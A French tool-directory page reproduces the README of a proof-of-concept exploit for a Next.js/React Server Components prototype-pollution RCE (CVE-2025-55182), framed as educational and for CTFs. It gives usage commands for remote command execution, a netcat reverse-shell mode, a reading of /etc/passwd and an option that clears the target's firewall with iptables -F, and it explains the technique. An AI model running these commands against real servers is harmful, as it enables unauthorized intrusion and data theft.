Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell est un outil d'exploitation PoC éducatif pour CVE-2025-55182, une faille critique de pollution de prototype dans les applications Next.js utilisant les composants serveur React. Conçu pour les CTF et la recherche, il dispose d'un mode à commande unique, d'une CLI web interactive et de capacités de shell inverse pour démontrer la RCE. | Kitploit
Outils/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHub
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

Voir le dépôt
56il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

WEB-CLI_RCE_React2Shell est un outil d'exploitation PoC éducatif pour CVE-2025-55182, une faille critique de pollution de prototype dans les applications Next.js utilisant les composants serveur React. Conçu pour les CTF et la recherche, il dispose d'un mode à commande unique, d'une CLI web interactive et de capacités de shell inverse pour démontrer la RCE.

Partager

REACT2SHELL

🎯 Aperçu rapide (Qu'est-ce que c'est ?)

Cet outil est un simple exploit Proof-of-Concept (PoC) pour CVE-2025-55182. Il s'agit d'une grave faille (Prototype Pollution) trouvée dans les applications Next.js qui utilisent React Server Components.

Si un serveur cible est vulnérable, ce script permet d'exécuter des commandes du système d'exploitation sur celui-ci (Remote Code Execution, ou RCE).

Cet outil est conçu pour l'apprentissage, les CTF et la recherche en sécurité responsable.

Screenshot 2025-12-12 214115

⚠️ Avertissement pour les étudiants et les participants aux CTF

UTILISEZ-LE DE MANIÈRE ÉTHIQUE. Exécutez cet exploit uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite et documentée. Toute utilisation non autorisée est illégale. Cet outil est uniquement destiné à des fins éducatives.

🌟 Comment l'utiliser

Cet outil propose trois façons principales d'exécuter des commandes : une simple commande unique, une console web interactive complète et une tentative de reverse shell classique.

⚙️ Installation

  1. Obtenez le code :

    git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
    cd REACT2SHELL
    
  2. Installez la bibliothèque :

    pip install requests
    

Mode 1 : Console Web Interactive (recommandé pour les CTF)

C'est la façon la plus simple d'interagir avec la cible. Il démarre une page web locale sur votre machine qui agit comme un terminal.

  1. Exécutez le script :

    python3 exploit.py <TARGET_URL> --web-cli
    

    Exemple : python3 exploit.py http://target.com/ --web-cli

  2. Ouvrez votre navigateur : Le script vous demandera d'ouvrir http://127.0.0.1:8000/. Vous pouvez ensuite taper des commandes (comme ls, whoami, cat /etc/passwd) directement dans la page web.

Mode 2 : Exécution d'une commande unique

Exécutez une commande et obtenez la sortie immédiatement dans votre terminal local. Idéal pour des vérifications rapides comme trouver votre ID utilisateur.

python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

Exemple : python3 exploit.py http://target.com/ --cmd 'id'

Mode 3 : Tentative de Reverse Shell

Utilisez ce mode si vous souhaitez une connexion stable et persistante. Remarque : Cela échoue souvent dans les environnements réels à cause des pare-feux (filtrage sortant).

  1. Démarrez votre écouteur (ex. netcat) :

    nc -lvnp 55555
    
  2. Exécutez l'exploit :

    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    
    • -i <VOTRE_IP> : L'IP de votre machine.
    • -p 55555 : Le port utilisé par votre écouteur.
    • --flush (Optionnel) : Tente d'exécuter iptables -F sur la cible en premier lieu pour vider les pare-feux de l'hôte.

🔬 Explication technique (Comment fonctionne l'exploit)

L'exploit utilise une faille de Prototype Pollution pour parvenir à une RCE.

  1. Prototype Pollution : Le script envoie une charge utile spécialement conçue à un point de terminaison Next.js vulnérable. Cette charge utile exploite une faille dans la façon dont le serveur traite les données, nous permettant d'ajouter des propriétés à la structure d'objet JavaScript de base (Object.prototype).
  2. Déclenchement de la RCE : Nous polluons une propriété interne spécifique qui contrôle le code exécuté par le serveur (en utilisant child_process de Node.js). Nous remplaçons la valeur de cette propriété par notre commande shell.
  3. Capture de la sortie : Lors de l'exécution de commandes en mode commande unique ou CLI web, l'exploit fait exécuter la commande au serveur (execSync) et lève immédiatement une erreur inoffensive. La sortie de la commande est astucieusement insérée dans le champ digest du message d'erreur. Le script Python lit ensuite ce champ pour obtenir les résultats.

🤝 Références et crédits

Cette recherche s'appuie sur les travaux initiaux et la divulgation de la communauté de la sécurité. Merci à tous les chercheurs et contributeurs open-source.

📚 Références clés

  • Dépôt PoC original pour CVE-2025-55182 - (La base de cet exploit.)
  • Exemple de code PoC original - (L'exemple de code initial.)
  • Vulnérabilité de sécurité critique dans les React Server Components - (Article officiel du blog React sur le sujet.)
  • Vulnérabilité critique dans React (CVE-2025-55182) - (Analyse de sécurité détaillée.)
  • Documentation des React Server Functions - (Documentation officielle expliquant le contexte du fonctionnement des composants vulnérables.)
Télécharger l’outil